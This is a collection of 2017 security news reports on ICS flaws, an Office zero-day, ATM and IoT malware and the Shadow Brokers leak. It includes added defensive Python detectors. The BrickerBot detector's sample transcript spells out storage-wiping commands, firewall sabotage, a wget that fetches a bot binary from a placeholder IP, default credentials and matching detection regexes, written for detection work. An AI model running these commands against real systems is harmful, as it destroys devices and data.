According to CyberX, there are several possible exploitation scenarios. For example, an attacker can use a search engine such as Shodan to identify vulnerable devices that are directly connected to the Internet, and then remotely exploit the vulnerabilities.

Another scenario described by the security firm involves a malicious actor delivering a piece of malware that exploits the vulnerabilities via a USB drive. A remote attacker can also compromise the targeted organization’s IT network and from there move onto the OT network, where they would have access to vulnerable devices.

“Attackers could exploit the vulnerabilities to install back-doors in order to perform industrial cyberespionage, deploy ransomware, and execute cyber-sabotage operations to disrupt production or cause catastrophic safety failures and environmental damage,” researchers warned in a blog post.

CODESYS software is used in hundreds of PLCs and other products from companies worldwide. According to the vendor, more than a million devices that use CODESYS software are sold every year and, as of mid-2016, over half of the products listed in the company’s device directory had been using the vulnerable component.

CyberX said CODESYS was quick to develop a patch, which the security firm has tested and validated. However, vulnerabilities in third-party components can be problematic as it can take a lot of time until patches reach end-users.

“Each device manufacturer must first apply the CODESYS patch to their own code, then recompile the firmware, and then send a firmware update to their end-users. The CODESYS patch can’t be installed by end-user organizations,” CyberX explained. “Most devices require firmware to be ‘reflashed,’ which is a lengthier and more complicated process than standard software updates on your phone or PC.”

This is not the first time a vulnerability affecting a third-party component has exposed devices from numerous vendors. Back in 2015, researchers disclosed a serious flaw in a CodeWrights library used by many manufacturing and technology companies for HART-based field devices.


Beware of an Unpatched Microsoft Word 0-Day Flaw being Exploited in the Wild
9.4.2017 thehackernews Vulnerebility
It's 2017, and opening a simple MS Word file could compromise your system.
Security researchers are warning of a new in-the-wild attack that silently installs malware on fully-patched computers by exploiting a serious — and yet unpatched — zero-day vulnerability in all current versions of Microsoft Office.
The Microsoft Office zero-day attack, uncovered by researchers from security firms McAfee and FireEye, starts simply with an email that attaches a malicious Word file containing a booby-trapped OLE2link object.
When opened, the exploit code gets executed and makes a connection to a remote server controlled by the attacker, from where it downloads a malicious HTML application file (HTA) that's disguised as a document created in Microsoft's RTF (Rich Text Format).
The HTA file then gets executed automatically with attackers gaining full code execution on the victim’s machine, downloading additional payloads from "different well-known malware families" to take over the victim's PC, and closing the weaponized Word file.
Zero-Day Attack Works on All Windows OS — Even Windows 10
According to researchers, this zero-day attack is severe as it gives the attackers the power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it does not require victims to enable Macros.
Due to these capabilities, this newly discovered attack works on all Windows operating systems even against Windows 10, which is believed to be Microsoft's most secure operating system to date.
Besides this, the exploit displays a decoy Word document for the victims to see before terminating in order to hide any sign of the attack.
"The successful exploit closes the bait Word document and pops up a fake one to show the victim," McAfee researchers wrote in a blog post published Friday. "In the background, the malware has already been stealthily installed on the victim's system."
"The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office."
Microsoft is aware of the zero-day flaw as the researchers say they responsibly disclosed the issue to the company after detecting active attacks leveraging this unpatched flaw back in January this year.
FireEye disclosed the details of the vulnerability a day after McAfee went public with the flaw.
The next scheduled Microsoft's release of security updates is this Tuesday, so it's highly unlikely the company will be able to deliver a patch before that day.
How to Protect Yourself against this Attack?
Since the attack works on fully patched systems, users are highly advised to follow the below recommendations to mitigate such attacks:
Do not open or download any suspicious Word files that arrive in an e-mail, even if you know the sender, until Microsoft releases a patch.
Since the attack does not work when a malicious document is viewed in Office Protected View feature, users are advised to enable this feature to view any Office documents.
Always keep your system and antivirus up-to-date.
Regularly backup your files in an external hard-drive.
Disabling Macros does not offer any protection against this attack, but users are still advised to do so to protect themselves against other attacks.
Always beware of phishing emails and spam, and do not click on suspicious attachments.
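
Both write-ups of this attack (the securityaffairs piece above and this one) make the same point: the downloaded .hta is dressed up to pass as an RTF document, and McAfee only spotted the VBScript “in a later part of the file”. A legitimate RTF file is plain text made of control words and braces; it never contains HTA or VBScript markup, so a file that matches both signatures is worth quarantining before an HTA host ever sees it. The scanner below is an added example, not code from McAfee or FireEye; the two sample blobs are constructed, harmless stand-ins (no real command is embedded), and the marker list is an assumption about what an HTA must contain to be useful to an attacker.

```python
"""Detect an HTML Application (HTA) hiding behind an RTF header.

Added example, not code from McAfee or FireEye: the attack described
above fetches an .hta whose first bytes look like an RTF document so
that content filters classify it as harmless. Real RTF never carries
HTA/VBScript markup, so matching both signatures is a strong signal.
"""
import re

RTF_MAGIC = b"{\\rtf"

# Markers that only make sense inside an HTML Application, not an RTF.
HTA_MARKERS = [
    re.compile(rb"<script\b[^>]*vbscript", re.IGNORECASE),   # VBScript block
    re.compile(rb"<hta:application\b", re.IGNORECASE),        # HTA window settings
    re.compile(rb"\bwindow\.close\s*\(", re.IGNORECASE),      # self-closing after running
]


def classify(blob: bytes) -> dict:
    """Return which signatures the blob matches and an overall verdict."""
    looks_rtf = blob.lstrip().startswith(RTF_MAGIC)
    hits = [m.pattern.decode() for m in HTA_MARKERS if m.search(blob)]
    if looks_rtf and hits:
        verdict = "suspicious: RTF header with HTA/VBScript content"
    elif hits:
        verdict = "hta"
    elif looks_rtf:
        verdict = "rtf"
    else:
        verdict = "other"
    return {"rtf_header": looks_rtf, "hta_markers": hits, "verdict": verdict}


# Constructed samples (not real malware): a benign RTF and a disguised HTA
# whose script body is deliberately empty apart from closing the window.
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 {\\fonttbl {\\f0 Calibri;}} Quarterly report\\par }"
DISGUISED_HTA = (
    b"{\\rtf1\\ansi Filler text that satisfies a naive RTF check.\n" + b" " * 512 +
    b"<html><head><HTA:APPLICATION ID=\"x\" WINDOWSTATE=\"minimize\"/>\n"
    b"<script language=\"VBScript\">\n"
    b"' placeholder: a real sample would drop and run a payload here\n"
    b"window.close()\n"
    b"</script></head></html>"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("disguised", DISGUISED_HTA)):
        print(name, "->", classify(blob)["verdict"])
```

A check like this belongs on the proxy or mail gateway that sees the second-stage download, not only on the endpoint. It complements rather than replaces the mitigation both articles name: documents opened in Office Protected View do not trigger the OLE2link fetch in the first place.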


ATMitch – Crooks stole $800,000 from 8 ATMs in Russia using Fileless Malware
9.4.2017 securityaffairs Virus

According to Kaspersky Lab, crooks have robbed at least 8 ATMs in Russia and stole $800,000 in just one night using a Fileless malware dubbed ATMitch.
According to experts at Kaspersky, hackers have robbed at least 8 ATMs in Russia and stole $800,000 in just one night.

The cyber heist caught the attention of security experts who, analyzing the CCTV footage, noticed a man walking up to the ATM and collecting cash, apparently without interacting with the machine.

Security teams at the affected banks have not found any evidence of malware or any sign of an intrusion. Just one of the targeted banks reported having discovered two files containing malware logs on the ATM.

The experts have discovered the following strings in the log files:

“Take the Money Bitch!”
“Dispense Success.”

In February, malware researchers at Kaspersky Lab reported that crooks had hit over 140 enterprises, including banks, telecoms, and government organizations in 40 countries. The cybercriminals leveraged ‘fileless malware’.

fileless malware

Malicious code is directly injected into the memory of the infected machine and the malware executes in the system’s RAM.

“A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers.” reads the analysis published by Kaspersky.

The attack was first spotted by a bank’s security team that discovered a copy of the Meterpreter code, an in-memory component of the Metasploit framework, in the physical memory of a Microsoft domain controller (DC).

The experts at Kaspersky Lab tracked the threats as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. The malware leverages PowerShell scripts stored in the Windows registry to load the Meterpreter code directly into memory; similar techniques based on PowerShell had already been adopted by other malware in the wild.

Malware researchers believe that the hackers that targeted the banks carried out the attacks with fileless malware.
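
The detail that matters for responders in the description above is where the loader lives: not as a file on disk but as a PowerShell command held in the registry, which is why disk-based scanning at the banks found nothing. The following Python hunt is an added example, not Kaspersky’s tooling; it walks a `.reg` export (the sample text is constructed, and the encoded command it finds is a harmless `Write-Host`) looking for autorun values that invoke PowerShell with a hidden window or an encoded command, and decodes the latter so an analyst can read what would run at logon.

```python
"""Hunt for PowerShell launchers persisted in Windows registry autorun keys.

Added example, not Kaspersky's code: the fileless technique above keeps
its loader as a PowerShell command inside the registry rather than on
disk. A .reg export (or a remote registry read) is scanned for autorun
values that start powershell with an encoded command, which is decoded
so the analyst can see what would execute at logon.
"""
import base64
import re

# Registry paths (suffixes, case-insensitive) that run a value at logon.
AUTORUN_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
VALUE_RE = re.compile(r'"([^"]+)"="(.*)"$')


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand takes base64 of UTF-16LE text; reverse that."""
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def scan_reg_export(text: str):
    """Return PowerShell launchers found under autorun keys in a .reg export."""
    findings = []
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        if current_key is None or not any(
            k.lower() in current_key.lower() for k in AUTORUN_KEYS
        ):
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name = m.group(1)
        # .reg exports escape backslashes and quotes; undo that for inspection.
        value = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
        if "powershell" not in value.lower():
            continue
        enc = ENCODED_FLAG.search(value)
        findings.append({
            "key": current_key,
            "name": name,
            "hidden": HIDDEN_FLAG.search(value) is not None,
            "decoded": decode_encoded_command(enc.group(1)) if enc else None,
        })
    return findings


# Constructed export (not from a real host). The encoded command is benign.
SAMPLE_B64 = base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16-le")
).decode()

SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
"OneDrive"="\\"C:\\\\Users\\\\analyst\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\" /background"
"Updater"="powershell.exe -NoP -W Hidden -Enc {SAMPLE_B64}"

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer]
"ShellState"=hex:24,00,00,00
"""

if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG):
        print(f["key"], f["name"], "hidden" if f["hidden"] else "", "->", f["decoded"])
```

The same logic applies to an export of the `HKLM` Run keys and of the Services and WMI subscription locations, which the page’s sources do not enumerate and which are therefore left out here. Because nothing on disk changes, the registry export plus a memory capture of `powershell.exe` is the evidence set to collect; a file-system timeline alone will look clean.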

During the recent Kaspersky Security Analyst Summit held in St. Maarten, security researchers Sergey Golovanov and Igor Soumenkov provided further details about their investigation on the ATM hacks against two Russian banks.


Experts have tracked the malware as ATMitch; it was first spotted in Russia and Kazakhstan, and the malicious code is remotely installed and executed on ATMs via their remote administration module.

“The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker.” reads the analysis from Kaspersky.

fileless malware ATMitch

The attackers connect to the ATM via an SSH tunnel, install the malicious code and use it to instruct the ATM to dispense cash.

Since the fileless malware leverages legitimate tools already present on the machine to remotely send the dispense command, the operation is very quick: a few seconds are enough to empty the ATM without leaving traces.

“The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).” states Kaspersky.

The experts highlighted that the attackers used a sophisticated method to compromise the bank network and access the ATM’s back-end panel.

To avoid triggering the alarm, attackers physically accessed the ATM by drilling a golf-ball sized hole in the front panel. The hole allows the attackers to access the cash dispenser using a serial distributed control wire (SDC RS485 standard).

Kaspersky experts explained that the technique was discovered after the police arrested a man dressed as a construction worker while he was drilling into an ATM.

Malware researchers warn ATM manufacturers and banks that crooks across Russia and Europe have already used the ATM drill attack for cyber heists.

Researchers did not identify a specific criminal gang behind these ATM hacks; however, they noticed that the source code used in the attacks contains references to the Russian language.

Kaspersky has discovered many similarities with techniques used by the Carbanak and GCMAN cyber gangs.


Millions of mobile phones and laptops potentially exposed to attack leveraging baseband zero-days
9.4.2017 securityaffairs Vulnerebility

The researcher Ralf Weinmann revealed that millions of mobile phones and laptops are potentially exposed to attack leveraging baseband zero-days he discovered.
The researcher Ralf-Phillip Weinmann, managing director at security firm Comsecuris, has disclosed a zero-day baseband vulnerability affecting Huawei smartphones, laptop WWAN modules, and IoT components.

Baseband is firmware used on smartphones to connect to cellular networks, to make voice calls, and transmit data.

An attacker can exploit baseband flaws to eavesdrop on mobile communications, take over the device to make calls and send SMS messages to premium numbers, or exfiltrate data.

The expert revealed the flaw this week at the Infiltrate Conference; the vulnerability could be exploited by attackers to execute a memory-corruption attack against affected devices over the air.

Fortunately, the attack is quite difficult to conduct.

The baseband vulnerability resides in the HiSilicon Balong integrated 4G LTE modems. The Balong application processor is called Kirin and is produced by HiSilicon Technologies, a subsidiary of Huawei Technologies. The affected firmware is present in several Huawei Honor smartphones, including the P10, Huawei Mate 9, Honor 9, 7, 5c and 6.

mobile baseband

Weinmann believes that millions of Honor smartphones could be exposed to the attack.

Weinmann presented multiple baseband vulnerabilities found in the Kirin application processor.

The expert also revealed that many laptops produced by IT vendors use the HiSilicon Balong integrated modem, as do a number of IoT devices.

“This baseband is much easier to exploit than other basebands. Why? I’m not sure if this was intentional, but the vendor actually published the source code for the baseband which is unusual,” Weinmann said. “Also, the malleability of this baseband implementation doesn’t just make it good for device experimenting, but also network testing.”

Weinmann speculates that HiSilicon may have mistakenly released the Kirin source code as part of a developer tar archive associated with the Huawei H60 Linux kernel data.

Weinmann demonstrated several attack scenarios against mobile phones.

A first attack scenario presented by the researcher involves setting up a bogus base station using open-source software called OpenLTE, which the attacker uses to simulate a network operator. The attacker can send specially crafted packets over the air that trigger a stack buffer overflow in the LTE stack, causing the phone to crash. Once the phone has rebooted, an attacker can gain persistence by installing a rootkit.

In a second attack scenario, an attacker with physical access to the phone and the private key pair data would install malicious tools in the firmware.

“It requires key material that is stored both by the carrier and on the SIM card in order to pass the mutual authentication between the phone and the network. Without this key material, a base station cannot pose as a legit network towards the device.”

For his tests Weinmann used his own VxWorks build environment, based on an evaluation version of VxWorks 7.0 that shipped with the Intel Galileo several years ago. The expert explained that the existence of a Lua scripting interpreter running in the baseband gives him further offensive options.

Weinmann did not disclose the technical details, to prevent threat actors in the wild from abusing his findings.

“I have chosen to only disclose lower-severity findings for now. Higher severity findings are in the pipeline.” Weinmann said.


The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers

The Shadow Brokers hacking crew sent a message to President Trump commenting on recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.

At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The Shadow Brokers provided the links to two distinct PGP-encrypted archives: the first one was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second one the group requested 1 million BTC.

The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION. The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old, with the newest timestamp dating to October 2013. In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump. A couple of weeks later the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers for less than two bitcoins.

In December 2016, the Shadow Brokers changed the sales model and put up the NSA’s hacking arsenal for direct sale on an underground website.

Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.

The group has dropped the bomb: it has finally released the password for the encrypted dump of NSA files, and anyone can now access them.

The group shared the following password:

CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN

The password was shared in a blog post on the Medium platform titled “Don’t Forget Your Base”.

The post is an open letter to President Donald Trump in which the group expresses its point of view on Trump’s policy; it explicitly refers to Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among others.

“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.

A security expert who goes online by the Twitter handle x0rz has uploaded all the files, after decryption, to GitHub.

Shadow brokers tools

A close look at the archive revealed the existence of numerous tools that were developed to target specific platforms, including:

rpc.cmsd, a remote root zero-day exploit for the Solaris Unix-based operating system.

x0rz (@x0rz), 8 Apr 2017: “Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day”

Notes on NSA operators’ access inside the GSM network of the Pakistani mobile operator Mobilink.

x0rz (@x0rz), 8 Apr 2017: “NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON #ShadowBrokers #EquationGroup #APT”

The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.

x0rz (@x0rz), 8 Apr 2017: “TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec”

The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with fake Accept-Language.

x0rz (@x0rz), 8 Apr 2017: “One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Language https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl”

The group is still accepting donations; its Bitcoin wallet is 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK, which has received a total of 10.41198465 bitcoins.


Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hacker group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA, and gained popularity last year for leaking a portion of those tools, is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA's hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after the failed auction, the group put up those hacking tools and exploits for direct sale on an underground website, categorizing them by type — like "exploits," "Trojans," and "implants" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers have finally released the password for the encrypted cache of NSA files, allowing anyone to unlock and download the auction data dump.
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing political views expressed by the Shadow Brokers on Trump's recent policies and events, such as Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among others.
A security researcher, who uses Twitter handle x0rz, has uploaded all files after decryption on Github and confirmed that the archive includes:
rpc.cmsd a remote root zero-day exploit for Solaris – Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
The evidence of the NSA operators' access inside the GSM network of Mobilink, one of the Pakistan's popular mobile operator companies.
More key findings will come as soon as other security researchers delve into the dump.
At the time, it's not confirmed whether the group holds more NSA hacking tools and exploits or this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.


RensenWare ransomware – You will decrypt files only scoring .2 Billion in TH12 Game
8.4.2017 securityaffairs Virus

The rensenWare ransomware, rather than demanding money, requires victims to score “over 0.2 billion” playing the “TH12” game.
Security experts at MalwareHunterTeam have spotted a new ransomware dubbed ‘rensenWare’. The ransomware is unusual: rather than demanding money, it requires victims to score “over 0.2 billion” playing “TH12 — Undefined Fantastic Object”.

The RensenWare ransomware scans a machine for certain file types and encrypts them with AES-256. When it encrypts a file it appends the .RENSENWARE extension to it.

When RensenWare completes the file encryption, it displays a ransom note featuring Captain Minamitsu Murasa from the Touhou Project series of shooting games made by Team Shanghai Alice.

The ransom note tells the victims that they must score over 0.2 billion in the Lunatic level of a Touhou Project game called TH12 ~ Undefined Fantastic Object. If the victim does not reach that score, or closes the ransomware, the files can never be recovered.

“That’s easy. You just play TH12 ~ Undefined Fantastic Object and score over 0.2 billion in LUNATIC level. this application will detect TH12 process and score automatically. DO NOT TRY CHEATING OR TEMRMINATE THIS APPLICATION IF YOU DON’T WANT TO BLOW UP THE ENCRYPTION KEY!” reads the ransom note.


MalwareHunterTeam @malwrhunterteam
Found a surprising ransomware today: "rensenWare".
Not asks for any money, but to play a game until you reach a score - and it's not a joke.
7:05 PM - 6 Apr 2017
“A new ransomware called RensenWare was discovered today by MalwareHunterTeam that makes a unique ransom demand; score over 0.2 billion in the LUNATIC level of TH12 ~ Undefined Fantastic Object or kiss your files goodbye!” wrote Lawrence Abrams from BleepingComputer. “While I do not think this ransomware was ever meant to be distributed, it shows what a creative developer can do to torment their victims.”

The RensenWare ransomware monitors the gaming progress of the victim by looking for a process called “th12.” The malware reads that process's memory to determine the current score and level of the game. When the victim reaches the Lunatic level and has scored over 0.2 billion points, the ransomware saves the key to the Desktop and initiates the decryption process.

Lawrence Abrams does not believe the rensenWare ransomware was developed for criminal purposes: “this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed.”

During the encryption operation, the malware doesn’t try to delete shadow volumes or take any other action to prevent a victim from restoring their files. This suggests the ransomware was created as a joke, or only to disturb a specific group of people.

The author of the ransomware, Tvple Eraser, explained the intent in a message posted on Twitter:

Tvple Eraser @0x00000Ff
Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day
3:00 PM - 7 Apr 2017
The rensenWare ransomware demonstrates the creativity of malware authors; experts have no doubt that we will see many other ‘creative’ themes in the future.

This malware doesn’t represent a threat, but it has the potential to become one.


Brickerbot botnet, the thingbot that permanently destroys IoT devices
8.4.2017 securityaffairs BotNet

Security researchers have spotted a new threat dubbed Brickerbot botnet that causes permanent damage to Internet of Things (IoT) devices.
Months ago we anticipated a spike in the number of IoT botnets. At the beginning it was Mirai, but other dangerous thingbots have since appeared in the wild, such as the Leet botnet and the Amnesia botnet.

Now a new botnet, dubbed Brickerbot, has appeared in the threat landscape. It was spotted by researchers at Radware, who found many similarities with the dreaded Mirai botnet.

The main difference from Mirai is that this threat permanently destroys poorly configured IoT devices.
The Brickerbot botnet was discovered on March 20, when researchers at Radware observed attacks against one of their honeypots.

“Over a four-day period, Radware’s honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage.” reads the analysis shared by Radware. “Besides this intense, short-lived bot (BrickerBot.1), Radware’s honeypot recorded attempts from a second, very similar bot (BrickerBot.2) which started PDoS attempts on the same date – both bots were discovered less than one hour apart – with lower intensity but more thorough and its location(s) concealed by TOR egress nodes.”

The honeypot logged 1,895 infection attempts by the Brickerbot botnet in just four days; most of the attacks originated from Argentina, while 333 attempts came from Tor nodes.

The Brickerbot botnet leverages Telnet brute force to compromise IoT devices, the same technique used by Mirai.

Brickerbot does not try to download a binary, which means that the experts at Radware were not able to retrieve the complete list of credentials used in its brute-force attempts; they were only able to record that the first attempted username/password pair was consistently ‘root’/‘vizxv’.

“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/‘vizxv’.” continues the advisory.

The malicious code targets Linux-based IoT devices running the BusyBox toolkit that have their Telnet port open and exposed on the Internet.

The PDoS attempts originated from a limited number of IP addresses; the attacking devices all expose port 22 (SSH) and run an older version of the Dropbear SSH server. Shodan identifies the vast majority of them as Ubiquiti network devices.


Once it has accessed the device, the malware starts wiping the onboard storage with rm -rf /*, disables TCP timestamps and limits the maximum number of kernel threads to one.


Brickerbot also flushes all iptables firewall and NAT rules and adds a rule to drop all outgoing packets. It attempts to wipe all the code on the vulnerable IoT device, leaving it unusable.

Experts at Radware provided the following suggestions to protect IoT devices:

Change the device’s factory default credentials.
Disable Telnet access to the device.
Network Behavioral Analysis can detect anomalies in traffic, combined with automatic signature generation for protection.
User/Entity Behavioral Analysis (UEBA) can spot granular anomalies in traffic early.
An IPS should block Telnet default credentials or reset Telnet connections. Use a signature to detect the provided command sequences.
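As an added illustration of the last suggestion (a signature for the command sequences), the following Python script, written for this page and not taken from Radware, groups constructed Telnet honeypot transcript lines into sessions and flags those that combine the credential pairs and destructive commands described above. The sample transcript is invented for the illustration, and the line format, the indicator regexes and the verdict thresholds are my own assumptions, not Radware's.

```python
import re
from collections import OrderedDict

# Constructed Telnet honeypot transcript (illustrative, not Radware's data).
# Line format: "<session-id> <source-ip> <text>", where text is either a
# "LOGIN <user> <password>" record or one command typed by the attacker.
SAMPLE_TRANSCRIPT = """\
s1 198.51.100.7 LOGIN root vizxv
s1 198.51.100.7 busybox rm -rf /*
s1 198.51.100.7 sysctl -w net.ipv4.tcp_timestamps=0
s1 198.51.100.7 sysctl -w kernel.threads-max=1
s1 198.51.100.7 iptables -F
s1 198.51.100.7 iptables -t nat -F
s1 198.51.100.7 iptables -A OUTPUT -j DROP
s2 203.0.113.9 LOGIN admin admin
s2 203.0.113.9 cat /proc/cpuinfo
s2 203.0.113.9 wget http://203.0.113.9/bot.arm7 -O /tmp/b
s3 192.0.2.44 LOGIN root root
s3 192.0.2.44 dd if=/dev/urandom of=/dev/mtd0
s3 192.0.2.44 cat /dev/urandom > /dev/mmcblk0
s3 192.0.2.44 route del default
"""

# Credential pairs the report attributes to BrickerBot's Telnet brute force.
BRICKERBOT_CREDS = {("root", "vizxv"), ("root", "root")}

# Indicators of the PDoS command sequence, grouped by effect. The regexes are
# my own; tune them to the exact shell strings your honeypot records.
DESTRUCTIVE = {
    "wipe_root_fs": re.compile(r"\brm\s+-rf\s+/\*"),
    "overwrite_flash": re.compile(
        r"\b(?:dd\b.*\bof=/dev/(?:mtd|mmc)|cat\b.*>\s*/dev/(?:mtd|mmc))"),
}
SABOTAGE = {
    "disable_tcp_timestamps": re.compile(r"net\.ipv4\.tcp_timestamps=0\b"),
    "limit_kernel_threads": re.compile(r"kernel\.threads-max=1\b"),
    "flush_iptables": re.compile(r"\biptables\b.*\s-F\b"),
    "drop_all_output": re.compile(r"\biptables\b.*-A\s+OUTPUT\b.*-j\s+DROP\b"),
    "remove_default_gw": re.compile(r"\broute\s+del\s+default\b"),
}


def parse_transcript(text):
    """Group transcript lines into sessions: {sid: {"ip", "login", "commands"}}."""
    sessions = OrderedDict()
    for line in text.splitlines():
        if not line.strip():
            continue
        sid, ip, rest = line.split(" ", 2)
        sess = sessions.setdefault(sid, {"ip": ip, "login": None, "commands": []})
        if rest.startswith("LOGIN "):
            _, user, password = rest.split(" ", 2)
            sess["login"] = (user, password)
        else:
            sess["commands"].append(rest)
    return sessions


def classify_session(sess):
    """Return (verdict, matched indicator names) for one Telnet session.

    'pdos' needs at least one destructive-storage command; 'suspicious' is
    reserved for sessions that only sabotage connectivity; anything else is
    'other' (e.g. a Mirai-style loader that fetches a binary instead).
    """
    hits = []
    for cmd in sess["commands"]:
        for name, rx in list(DESTRUCTIVE.items()) + list(SABOTAGE.items()):
            if rx.search(cmd) and name not in hits:
                hits.append(name)
    if sess["login"] in BRICKERBOT_CREDS:
        hits.append("brickerbot_default_creds")
    destructive = [h for h in hits if h in DESTRUCTIVE]
    sabotage = [h for h in hits if h in SABOTAGE]
    if destructive:
        verdict = "pdos"
    elif len(sabotage) >= 2:
        verdict = "suspicious"
    else:
        verdict = "other"
    return verdict, hits


def triage(text):
    """Map every session id in a transcript to its verdict."""
    return {sid: classify_session(s)[0] for sid, s in parse_transcript(text).items()}


if __name__ == "__main__":
    for sid, sess in parse_transcript(SAMPLE_TRANSCRIPT).items():
        verdict, hits = classify_session(sess)
        print(f"{sid} {sess['ip']:<14} {verdict:<10} {', '.join(hits)}")
```

The verdict deliberately keys on the storage-destroying commands rather than on the credential pair: a Mirai-style loader logging in with the same defaults and then fetching a binary (session s2 above) is a different threat and should not be labelled PDoS.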


Sathurbot botnet, over 20,000 bots launched a distributed WordPress password attack
8.4.2017 securityaffairs BotNet

Experts have observed a new threat targeting WordPress installations: the Sathurbot botnet attempts to brute-force WordPress accounts.
Once it has compromised a WordPress website, the Sathurbot botnet uses it to spread the malware.

Sathurbot leverages torrents as a delivery mechanism. Once a website is compromised it is used to host fake movie and software torrents, so that victims searching for a movie or a piece of software to download receive malicious links instead of legitimate torrents.

Both the movie and the software torrent contain an executable that, once launched, loads the Sathurbot DLL.

“The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file.” reads the analysis published by ESET. “The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim to run the executable which loads the Sathurbot DLL”


Once executed, the Sathurbot Trojan informs the victim that their machine has become a bot in the Sathurbot botnet.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.” states ESET.

